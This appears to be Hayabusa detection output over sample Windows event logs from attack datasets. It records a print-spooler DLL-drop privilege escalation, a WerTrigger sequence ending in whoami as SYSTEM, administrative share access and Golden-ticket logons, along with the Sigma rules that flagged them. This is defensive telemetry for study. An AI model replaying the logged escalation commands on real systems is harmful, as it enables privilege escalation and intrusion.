Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.INI | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 
747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDNAMES.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDDTYPE.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 
747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHEM.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHMX.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.622 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old\1 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\blah\blah\phoneinfo.dll | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Suspicious Print Port | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports\c:\blah\blah\phoneinfo.dll: (Empty) | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SPL | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-E8D1-5F33-0000-001007B63A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:28.521 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:19.719 +09:00,MSEDGEWIN10,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.23,../hayabusa-rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1740 | PGUID: 747F3D96-E90A-5F33-0000-0010863C0100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3320 | PGUID: 747F3D96-E90C-5F33-0000-0010CB420200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x41c24 | PID: 5128 | PGUID: 747F3D96-E920-5F33-0000-001043920A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" | Process: 
C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | LID: 0x3e7 | PID: 6952 | PGUID: 747F3D96-E922-5F33-0000-00107A2B0B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\Explorer.EXE | Tgt Process: C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 5144 | Src PGUID: 747F3D96-E914-5F33-0000-001009990500 | Tgt PID: 7480 | Tgt PGUID: 747F3D96-E928-5F33-0000-0010B8330D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7836 | PGUID: 747F3D96-E938-5F33-0000-00101CA50E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7852 | PGUID: 747F3D96-E939-5F33-0000-0010ACAB0E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7868 | PGUID: 747F3D96-E93A-5F33-0000-001014B30E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder 
Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7888 | PGUID: 747F3D96-E93B-5F33-0000-0010C1B40E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wermgr.exe -upload | LID: 0x3e7 | PID: 8032 | PGUID: 747F3D96-E93C-5F33-0000-0010A6F00E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 7460 | PGUID: 747F3D96-E940-5F33-0000-001039310F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack-admu-test1 | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2275e86d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 
0x2276a30d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276a30d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276ac17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276b0af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:37:35.319 
+09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b0af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: JUMP01$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b890,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: not_existing_user | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2276d109,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx 2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx 2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: not_existing_user | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x119b90e2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a72,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a8f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9aa3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9ab2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x119b9b27,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9e04,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba401,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba414,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba427,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-25 18:58:51.434 +09:00,MSEDGEWIN10,11,info,,File Created,Path: 
